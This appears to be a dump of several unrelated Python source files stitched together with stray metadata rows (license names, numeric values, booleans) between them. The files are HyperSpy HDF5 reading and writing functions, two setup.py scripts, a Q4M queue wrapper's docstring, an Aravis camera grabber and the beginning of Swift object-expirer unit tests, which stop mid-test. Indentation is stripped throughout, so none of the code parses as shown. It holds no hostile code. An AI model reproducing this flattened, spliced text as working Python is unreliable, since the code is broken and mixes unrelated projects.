exp['attributes']['learning_results'] = hdfgroup2dict(
group['mva_results'], lazy=lazy)
if 'peak_mva_results' in group.keys():
exp['attributes']['peak_learning_results'] = hdfgroup2dict(
group['peak_mva_results'], lazy=lazy)
# Replace the old signal and name keys with their current names
if 'signal' in exp['metadata']:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp['metadata']["Signal"]['signal_type'] = \
exp['metadata']['signal']
del exp['metadata']['signal']
if 'name' in exp['metadata']:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp['metadata']['General']['title'] = \
exp['metadata']['name']
del exp['metadata']['name']
if current_file_version < LooseVersion("1.2"):
if '_internal_parameters' in exp['metadata']:
exp['metadata']['_HyperSpy'] = \
exp['metadata']['_internal_parameters']
del exp['metadata']['_internal_parameters']
if 'stacking_history' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Stacking_history"] = \
exp['metadata']['_HyperSpy']['stacking_history']
del exp['metadata']['_HyperSpy']["stacking_history"]
if 'folding' in exp['metadata']['_HyperSpy']:
exp['metadata']['_HyperSpy']["Folding"] = \
exp['metadata']['_HyperSpy']['folding']
del exp['metadata']['_HyperSpy']["folding"]
if 'Variance_estimation' in exp['metadata']:
if "Noise_properties" not in exp["metadata"]:
exp["metadata"]["Noise_properties"] = {}
exp['metadata']['Noise_properties']["Variance_linear_model"] = \
exp['metadata']['Variance_estimation']
del exp['metadata']['Variance_estimation']
if "TEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["TEM"] = \
exp["metadata"]["TEM"]
del exp["metadata"]["TEM"]
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
if "EELS" in tem:
if "dwell_time" in tem:
tem["EELS"]["dwell_time"] = tem["dwell_time"]
del tem["dwell_time"]
if "dwell_time_units" in tem:
tem["EELS"]["dwell_time_units"] = tem["dwell_time_units"]
del tem["dwell_time_units"]
if "exposure" in tem:
tem["EELS"]["exposure"] = tem["exposure"]
del tem["exposure"]
if "exposure_units" in tem:
tem["EELS"]["exposure_units"] = tem["exposure_units"]
del tem["exposure_units"]
if "Detector" not in tem:
tem["Detector"] = {}
tem["Detector"] = tem["EELS"]
del tem["EELS"]
if "EDS" in tem:
if "Detector" not in tem:
tem["Detector"] = {}
if "EDS" not in tem["Detector"]:
tem["Detector"]["EDS"] = {}
tem["Detector"]["EDS"] = tem["EDS"]
del tem["EDS"]
del tem
if "SEM" in exp["metadata"]:
if "Acquisition_instrument" not in exp["metadata"]:
exp["metadata"]["Acquisition_instrument"] = {}
exp["metadata"]["Acquisition_instrument"]["SEM"] = \
exp["metadata"]["SEM"]
del exp["metadata"]["SEM"]
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "EDS" in sem:
if "Detector" not in sem:
sem["Detector"] = {}
if "EDS" not in sem["Detector"]:
sem["Detector"]["EDS"] = {}
sem["Detector"]["EDS"] = sem["EDS"]
del sem["EDS"]
del sem
if "Sample" in exp["metadata"] and "Xray_lines" in exp[
"metadata"]["Sample"]:
exp["metadata"]["Sample"]["xray_lines"] = exp[
"metadata"]["Sample"]["Xray_lines"]
del exp["metadata"]["Sample"]["Xray_lines"]
for key in ["title", "date", "time", "original_filename"]:
if key in exp["metadata"]:
if "General" not in exp["metadata"]:
exp["metadata"]["General"] = {}
exp["metadata"]["General"][key] = exp["metadata"][key]
del exp["metadata"][key]
for key in ["record_by", "signal_origin", "signal_type"]:
if key in exp["metadata"]:
if "Signal" not in exp["metadata"]:
exp["metadata"]["Signal"] = {}
exp["metadata"]["Signal"][key] = exp["metadata"][key]
del exp["metadata"][key]
if current_file_version < LooseVersion("3.0"):
if "Acquisition_instrument" in exp["metadata"]:
# Move tilt_stage to Stage.tilt_alpha
# Move exposure time to Detector.Camera.exposure_time
if "TEM" in exp["metadata"]["Acquisition_instrument"]:
tem = exp["metadata"]["Acquisition_instrument"]["TEM"]
exposure = None
if "tilt_stage" in tem:
tem["Stage"] = {"tilt_alpha": tem["tilt_stage"]}
del tem["tilt_stage"]
if "exposure" in tem:
exposure = "exposure"
# Digital_micrograph plugin was parsing to 'exposure_time'
# instead of 'exposure': need this to be compatible with
# previous behaviour
if "exposure_time" in tem:
exposure = "exposure_time"
if exposure is not None:
if "Detector" not in tem:
tem["Detector"] = {"Camera": {
"exposure": tem[exposure]}}
tem["Detector"]["Camera"] = {"exposure": tem[exposure]}
del tem[exposure]
# Move tilt_stage to Stage.tilt_alpha
if "SEM" in exp["metadata"]["Acquisition_instrument"]:
sem = exp["metadata"]["Acquisition_instrument"]["SEM"]
if "tilt_stage" in sem:
sem["Stage"] = {"tilt_alpha": sem["tilt_stage"]}
del sem["tilt_stage"]
return exp
def dict2hdfgroup(dictionary, group, **kwds):
"Recursive writer of dicts and signals"
from hyperspy.misc.utils import DictionaryTreeBrowser
from hyperspy.signal import BaseSignal
def parse_structure(key, group, value, _type, **kwds):
try:
# Here we check if there are any signals in the container, as
# casting a long list of signals to a numpy array takes a very long
# time. So we check if there are any, and save numpy the trouble
if np.any([isinstance(t, BaseSignal) for t in value]):
tmp = np.array([[0]])
else:
tmp = np.array(value)
except ValueError:
tmp = np.array([[0]])
if tmp.dtype == np.dtype('O') or tmp.ndim != 1:
dict2hdfgroup(dict(zip(
[str(i) for i in range(len(value))], value)),
group.create_group(_type + str(len(value)) + '_' + key),
**kwds)
elif tmp.dtype.type is np.unicode_:
if _type + key in group:
del group[_type + key]
group.create_dataset(_type + key,
tmp.shape,
dtype=h5py.special_dtype(vlen=str),
**kwds)
group[_type + key][:] = tmp[:]
else:
if _type + key in group:
del group[_type + key]
group.create_dataset(
_type + key,
data=tmp,
**kwds)
for key, value in dictionary.items():
if isinstance(value, dict):
dict2hdfgroup(value, group.create_group(key),
**kwds)
elif isinstance(value, DictionaryTreeBrowser):
dict2hdfgroup(value.as_dictionary(),
group.create_group(key),
**kwds)
elif isinstance(value, BaseSignal):
kn = key if key.startswith('_sig_') else '_sig_' + key
write_signal(value, group.require_group(kn))
elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):
overwrite_dataset(group, value, key, **kwds)
elif value is None:
group.attrs[key] = '_None_'
elif isinstance(value, bytes):
try:
# binary string if has any null characters (otherwise not
# supported by hdf5)
value.index(b'\x00')
group.attrs['_bs_' + key] = np.void(value)
except ValueError:
group.attrs[key] = value.decode()
elif isinstance(value, str):
group.attrs[key] = value
elif isinstance(value, AxesManager):
dict2hdfgroup(value.as_dictionary(),
group.create_group('_hspy_AxesManager_' + key),
**kwds)
elif isinstance(value, list):
if len(value):
parse_structure(key, group, value, '_list_', **kwds)
else:
group.attrs['_list_empty_' + key] = '_None_'
elif isinstance(value, tuple):
if len(value):
parse_structure(key, group, value, '_tuple_', **kwds)
else:
group.attrs['_tuple_empty_' + key] = '_None_'
elif value is Undefined:
continue
else:
try:
group.attrs[key] = value
except BaseException:
_logger.exception(
"The hdf5 writer could not write the following "
"information in the file: %s : %s", key, value)
def get_signal_chunks(shape, dtype, signal_axes=None):
"""Function that calculates chunks for the signal, preferably at least one
chunk per signal space.
Parameters
----------
shape : tuple
the shape of the dataset to be sored / chunked
dtype : {dtype, string}
the numpy dtype of the data
signal_axes: {None, iterable of ints}
the axes defining "signal space" of the dataset. If None, the default
h5py chunking is performed.
"""
typesize = np.dtype(dtype).itemsize
if signal_axes is None:
return h5py._hl.filters.guess_chunk(shape, None, typesize)
# largely based on the guess_chunk in h5py
CHUNK_MAX = 1024 * 1024
want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize
if want_to_keep >= CHUNK_MAX:
chunks = [1 for _ in shape]
for i in signal_axes:
chunks[i] = shape[i]
return tuple(chunks)
chunks = [i for i in shape]
idx = 0
navigation_axes = tuple(i for i in range(len(shape)) if i not in
signal_axes)
nchange = len(navigation_axes)
while True:
chunk_bytes = multiply(chunks) * typesize
if chunk_bytes < CHUNK_MAX:
break
if multiply([chunks[i] for i in navigation_axes]) == 1:
break
change = navigation_axes[idx % nchange]
chunks[change] = np.ceil(chunks[change] / 2.0)
idx += 1
return tuple(int(x) for x in chunks)
def overwrite_dataset(group, data, key, signal_axes=None, chunks=None, **kwds):
if chunks is None:
if isinstance(data, da.Array):
# For lazy dataset, by default, we use the current dask chunking
chunks = tuple([c[0] for c in data.chunks])
else:
# If signal_axes=None, use automatic h5py chunking, otherwise
# optimise the chunking to contain at least one signal per chunk
chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)
if np.issubdtype(data.dtype, np.dtype('U')):
# Saving numpy unicode type is not supported in h5py
data = data.astype(np.dtype('S'))
if data.dtype == np.dtype('O'):
# For saving ragged array
# http://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data
group.require_dataset(key,
chunks,
dtype=h5py.special_dtype(vlen=data[0].dtype),
**kwds)
group[key][:] = data[:]
maxshape = tuple(None for _ in data.shape)
got_data = False
while not got_data:
try:
these_kwds = kwds.copy()
these_kwds.update(dict(shape=data.shape,
dtype=data.dtype,
exact=True,
maxshape=maxshape,
chunks=chunks,
shuffle=True,))
# If chunks is True, the `chunks` attribute of `dset` below
# contains the chunk shape guessed by h5py
dset = group.require_dataset(key, **these_kwds)
got_data = True
except TypeError:
# if the shape or dtype/etc do not match,
# we delete the old one and create new in the next loop run
del group[key]
if dset == data:
# just a reference to already created thing
pass
else:
_logger.info(f"Chunks used for saving: {dset.chunks}")
if isinstance(data, da.Array):
if data.chunks != dset.chunks:
data = data.rechunk(dset.chunks)
da.store(data, dset)
elif data.flags.c_contiguous:
dset.write_direct(data)
else:
dset[:] = data
def hdfgroup2dict(group, dictionary=None, lazy=False):
if dictionary is None:
dictionary = {}
for key, value in group.attrs.items():
if isinstance(value, bytes):
value = value.decode()
if isinstance(value, (np.string_, str)):
if value == '_None_':
value = None
elif isinstance(value, np.bool_):
value = bool(value)
elif isinstance(value, np.ndarray) and value.dtype.char == "S":
# Convert strings to unicode
value = value.astype("U")
if value.dtype.str.endswith("U1"):
value = value.tolist()
# skip signals - these are handled below.
if key.startswith('_sig_'):
pass
elif key.startswith('_list_empty_'):
dictionary[key[len('_list_empty_'):]] = []
elif key.startswith('_tuple_empty_'):
dictionary[key[len('_tuple_empty_'):]] = ()
elif key.startswith('_bs_'):
dictionary[key[len('_bs_'):]] = value.tobytes()
# The following two elif stataments enable reading date and time from
# v < 2 of HyperSpy's metadata specifications
elif key.startswith('_datetime_date'):
date_iso = datetime.date(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
elif key.startswith('_datetime_time'):
date_iso = datetime.time(
*ast.literal_eval(value[value.index("("):])).isoformat()
dictionary[key.replace("_datetime_", "")] = date_iso
else:
dictionary[key] = value
if not isinstance(group, h5py.Dataset):
for key in group.keys():
if key.startswith('_sig_'):
from hyperspy.io import dict2signal
dictionary[key[len('_sig_'):]] = (
dict2signal(hdfgroup2signaldict(
group[key], lazy=lazy)))
elif isinstance(group[key], h5py.Dataset):
dat = group[key]
kn = key
if key.startswith("_list_"):
if (h5py.check_string_dtype(dat.dtype) and
hasattr(dat, 'asstr')):
# h5py 3.0 and newer
# https://docs.h5py.org/en/3.0.0/strings.html
dat = dat.asstr()[:]
ans = np.array(dat)
ans = ans.tolist()
kn = key[6:]
elif key.startswith("_tuple_"):
ans = np.array(dat)
ans = tuple(ans.tolist())
kn = key[7:]
elif dat.dtype.char == "S":
ans = np.array(dat)
try:
ans = ans.astype("U")
except UnicodeDecodeError:
# There are some strings that must stay in binary,
# for example dill pickles. This will obviously also
# let "wrong" binary string fail somewhere else...
pass
elif lazy:
ans = da.from_array(dat, chunks=dat.chunks)
else:
ans = np.array(dat)
dictionary[kn] = ans
elif key.startswith('_hspy_AxesManager_'):
dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
elif key.startswith('_list_'):
dictionary[key[7 + key[6:].find('_'):]] = \
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))]
elif key.startswith('_tuple_'):
dictionary[key[8 + key[7:].find('_'):]] = tuple(
[i for k, i in sorted(iter(
hdfgroup2dict(
group[key], lazy=lazy).items()
))])
else:
dictionary[key] = {}
hdfgroup2dict(
group[key],
dictionary[key],
lazy=lazy)
return dictionary
def write_signal(signal, group, **kwds):
"Writes a hyperspy signal to a hdf5 group"
group.attrs.update(get_object_package_info(signal))
if default_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
if 'compression' not in kwds:
kwds['compression'] = 'gzip'
for axis in signal.axes_manager._axes:
axis_dict = axis.get_axis_dictionary()
coord_group = group.create_group(
'axis-%s' % axis.index_in_array)
dict2hdfgroup(axis_dict, coord_group, **kwds)
mapped_par = group.create_group(metadata)
metadata_dict = signal.metadata.as_dictionary()
overwrite_dataset(group, signal.data, 'data',
signal_axes=signal.axes_manager.signal_indices_in_array,
**kwds)
if default_version < LooseVersion("1.2"):
metadata_dict["_internal_parameters"] = \
metadata_dict.pop("_HyperSpy")
# Remove chunks from the kwds since it wouldn't have the same rank as the
# dataset and can't be used
kwds.pop('chunks', None)
dict2hdfgroup(metadata_dict, mapped_par, **kwds)
original_par = group.create_group(original_metadata)
dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,
**kwds)
learning_results = group.create_group('learning_results')
dict2hdfgroup(signal.learning_results.__dict__,
learning_results, **kwds)
if hasattr(signal, 'peak_learning_results'):
peak_learning_results = group.create_group(
'peak_learning_results')
dict2hdfgroup(signal.peak_learning_results.__dict__,
peak_learning_results, **kwds)
if len(signal.models):
model_group = group.file.require_group('Analysis/models')
dict2hdfgroup(signal.models._models.as_dictionary(),
model_group, **kwds)
for model in model_group.values():
model.attrs['_signal'] = group.name
def file_writer(filename, signal, *args, **kwds):
"""Writes data to hyperspy's hdf5 format
Parameters
----------
filename: str
signal: a BaseSignal instance
*args, optional
**kwds, optional
"""
with h5py.File(filename, mode='w') as f:
f.attrs['file_format'] = "HyperSpy"
f.attrs['file_format_version'] = version
exps = f.create_group('Experiments')
group_name = signal.metadata.General.title if \
signal.metadata.General.title else '__unnamed__'
# / is a invalid character, see #942
if "/" in group_name:
group_name = group_name.replace("/", "-")
expg = exps.create_group(group_name)
# Add record_by metadata for backward compatibility
smd = signal.metadata.Signal
if signal.axes_manager.signal_dimension == 1:
smd.record_by = "spectrum"
elif signal.axes_manager.signal_dimension == 2:
smd.record_by = "image"
else:
smd.record_by = ""
try:
write_signal(signal, expg, **kwds)
except BaseException:
raise
finally:
del smd.record_by
|
gpl-3.0
| -2,065,360,871,214,329,600
| 38.645885
| 82
| 0.541169
| false
| 4.211391
| false
| false
| false
|
StartTheShift/thunderdome-logging
|
setup.py
|
1
|
1329
|
import sys
from setuptools import setup, find_packages
#next time:
#python setup.py register
#python setup.py sdist upload
version = open('thunderdome_logging/VERSION', 'r').readline().strip()
long_desc = """
Extension for thunderdome which allows error logging in the graph.
"""
setup(
name='thunderdome-logging',
version=version,
description='Thunderdome graph error logging',
dependency_links=['https://github.com/StartTheShift/thunderdome-logging/archive/{0}.tar.gz#egg=thunderdome-logging-{0}'.format(version)],
long_description=long_desc,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='cassandra,titan,ogm,thunderdome,logging',
install_requires=['thunderdome==0.4.3'],
author='StartTheShift',
author_email='dev@shift.com',
url='https://github.com/StartTheShift/thunderdome-logging',
license='BSD',
packages=find_packages(),
include_package_data=True,
)
|
mit
| 7,834,285,208,966,804,000
| 33.076923
| 141
| 0.669676
| false
| 3.797143
| false
| false
| false
|
cubicdaiya/python-q4m
|
python_q4m/__init__.py
|
1
|
1380
|
# -*- coding: utf-8 -*-
import python_q4m
__author__ = "Tatsuhiko Kubo (cubicdaiya@gmail.com)"
__version__ = "0.0.6"
__license__ = "GPL2"
__doc__ = """
This module is simple Q4M operation wrapper developed by pixiv Inc. for asynchronous upload system
Simple example of usage is followings
>>> from python_q4m.q4m import *
>>> class QueueTable(Q4M):
>>> def __init__(self, con):
>>> super(self.__class__, self).__init__(con)
>>> self.table = 'queue_table'
>>> self.columns = ['id',
>>> 'msg',
>>> ]
>>> try:
>>> con = MySQLdb.connect(host='localhost',
>>> db=dbname,
>>> user=username,
>>> passwd=password,
>>> )
>>> q = QueueTable(con)
>>> q.enqueue([1, 'msg'])
>>> while q.wait() == 0:
>>> time.sleep(1);
>>> res = q.dequeue()
>>> print res['id']
>>> print res['msg']
>>> q.end()
>>> con.close()
>>> except MySQLdb.Error, e:
>>> print 'Error %d: %s' % (e.args[0], e.args[1])
>>> q.abort()
>>> con.close()
And it is necessary to create following table for above example.
CREATE TABLE `queue_table` (`id` int(11) NOT NULL, `msg` text NOT NULL) ENGINE=QUEUE;
"""
|
gpl-2.0
| 372,192,313,206,318,800
| 30.363636
| 98
| 0.465942
| false
| 3.424318
| false
| false
| false
|
semeniuta/FlexVi
|
flexvi/daq/aravisgrabber.py
|
1
|
1399
|
from enum import Enum
from gi.repository import Aravis as ar
import aravis as pyar
class AravisEnv:
def __init__(self):
''' Get device IDs and initialize Camera objects '''
ar.update_device_list()
self.device_ids = pyar.get_device_ids()
self.cameras = {i: pyar.Camera(i) for i in self.device_ids}
class AravisGrabber:
States = Enum('States', 'not_initialized not_functional initialized camera_selected')
currtent_state = States.not_initialized
current_camera = None
def __init__(self, env):
self.env = env
def select_camera_by_id(self, camera_id):
if camera_id not in self.device_ids:
raise Exception('Incorrect device id provided')
self.current_camera = self.env.cameras[camera_id]
self.current_state = self.States.camera_selected
def select_camera_by_index(self, idx):
if idx < 0 or idx > len(self.env.device_ids):
raise Exception('Incorrect device index provided')
self.current_camera = self.env.cameras[self.env.device_ids[idx]]
self.current_state = self.States.camera_selected
def grab_image(self):
print 'Grabbing...'
if self.current_state is not self.States.camera_selected:
raise Exception('No camera has been selected')
im = pyar.get_frame(self.current_camera)
return im
|
gpl-2.0
| -4,096,126,815,948,293,000
| 35.815789
| 89
| 0.643317
| false
| 3.770889
| false
| false
| false
|
eliostvs/tomate-exec-plugin
|
setup.py
|
1
|
1335
|
#!/bin/env python
import os
from setuptools import setup
def find_xdg_data_files(syspath, relativepath, pkgname, data_files=[]):
for (dirname, _, filenames) in os.walk(relativepath):
if filenames:
syspath = syspath.format(pkgname=pkgname)
subpath = dirname.split(relativepath)[1]
if subpath.startswith("/"):
subpath = subpath[1:]
files = [os.path.join(dirname, f) for f in filenames]
data_files.append((os.path.join(syspath, subpath), files))
return data_files
def find_data_files(data_map, pkgname):
data_files = []
for (syspath, relativepath) in data_map:
find_xdg_data_files(syspath, relativepath, pkgname, data_files)
return data_files
DATA_FILES = [
("share/{pkgname}/plugins", "data/plugins"),
]
setup(
author="Elio Esteves Duarte",
author_email="elio.esteves.duarte@gmail.com",
description="Tomate plugin that executes commands when the timer starts, stops or finish",
include_package_data=True,
keywords="pomodoro,tomate",
license="GPL-3",
long_description=open("README.md").read(),
name="tomate-exec-plugin",
data_files=find_data_files(DATA_FILES, "tomate"),
url="https://github.com/eliostvs/tomate-exec-plugin",
version="0.5.0",
zip_safe=False,
)
|
gpl-3.0
| -5,612,258,948,244,956,000
| 26.244898
| 94
| 0.64794
| false
| 3.379747
| false
| false
| false
|
larsbutler/swift
|
test/unit/obj/test_expirer.py
|
1
|
28044
|
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from unittest import main, TestCase
from test.unit import FakeRing, mocked_http_conn, debug_logger
from copy import deepcopy
from tempfile import mkdtemp
from shutil import rmtree
import mock
import six
from six.moves import urllib
from swift.common import internal_client, utils, swob
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
internal_client = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda *a, **kw: None
internal_client.sleep = not_sleep
self.rcache = mkdtemp()
self.conf = {'recon_cache_path': self.rcache}
self.logger = debug_logger('test-expirer')
def tearDown(self):
rmtree(self.rcache)
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.old_loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
x.get_process_values(vals)
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
x.get_process_values({})
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
self.obj_containers_in_order = []
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
self.obj_containers_in_order.append(container)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': six.text_type(x)}
for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': six.text_type(x)}
for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
'0': set('1-one 2-two 3-three'.split()),
'1': set('2-two 3-three 4-four'.split()),
'2': set('5-five 6-six'.split()),
'3': set(u'7-seven\u2661'.split()),
}
x = ObjectExpirer(self.conf)
x.swift = InternalClient(containers)
deleted_objects = {}
for i in range(3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers['3'].pop(),
deleted_objects['3'].pop().decode('utf8'))
self.assertEqual(containers, deleted_objects)
self.assertEqual(len(set(x.obj_containers_in_order[:4])), 4)
def test_delete_object(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
actual_obj = 'actual_obj'
timestamp = int(time())
reclaim_ts = timestamp - x.reclaim_age
container = 'container'
obj = 'obj'
http_exc = {
resp_code:
internal_client.UnexpectedResponse(
str(resp_code), swob.HTTPException(status=resp_code))
for resp_code in {404, 412, 500}
}
exc_other = Exception()
def check_call_to_delete_object(exc, ts, should_pop):
x.logger.clear()
start_reports = x.report_objects
with mock.patch.object(x, 'delete_actual_object',
side_effect=exc) as delete_actual:
with mock.patch.object(x, 'pop_queue') as pop_queue:
x.delete_object(actual_obj, ts, container, obj)
delete_actual.assert_called_once_with(actual_obj, ts)
log_lines = x.logger.get_lines_for_level('error')
if should_pop:
pop_queue.assert_called_once_with(container, obj)
self.assertEqual(start_reports + 1, x.report_objects)
self.assertFalse(log_lines)
else:
self.assertFalse(pop_queue.called)
self.assertEqual(start_reports, x.report_objects)
self.assertEqual(1, len(log_lines))
self.assertIn('Exception while deleting object container obj',
log_lines[0])
# verify pop_queue logic on exceptions
for exc, ts, should_pop in [(None, timestamp, True),
(http_exc[404], timestamp, False),
(http_exc[412], timestamp, False),
(http_exc[500], reclaim_ts, False),
(exc_other, reclaim_ts, False),
(http_exc[404], reclaim_ts, True),
(http_exc[412], reclaim_ts, True)]:
try:
check_call_to_delete_object(exc, ts, should_pop)
except AssertionError as err:
self.fail("Failed on %r at %f: %s" % (exc, ts, err))
def test_report(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
x.report()
self.assertEqual(x.logger.get_lines_for_level('info'), [])
x.logger._clear()
x.report(final=True)
self.assertTrue(
'completed' in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' not in str(x.logger.get_lines_for_level('info')))
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue(
'completed' not in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' in str(x.logger.get_lines_for_level('info')))
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.get_lines_for_level('error'),
["Unhandled exception: "])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
"'str' object has no attribute 'get_account_info'")
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_once_unicode_problem(self):
class InternalClient(object):
container_ring = FakeRing()
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return [{'name': u'1234'}]
def iter_objects(*a, **kw):
return [{'name': u'1234-troms\xf8'}]
def make_request(*a, **kw):
pass
def delete_container(*a, **kw):
pass
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests):
x.run_once()
self.assertEqual(len(requests), 3)
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer(self.conf,
logger=self.logger)
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
logs = x.logger.all_log_lines()
self.assertEqual(logs['info'], [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
self.assertTrue('error' not in logs)
# Reverse test to be sure it still would blow up the way expected.
fake_swift = InternalClient([{'name': str(int(time() - 86400))}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'), [
'Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][-1]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'This should not have been called')
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertTrue('error' not in x.logger.all_log_lines())
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = should_not_be_called
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj '
'This should not have been called: ' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
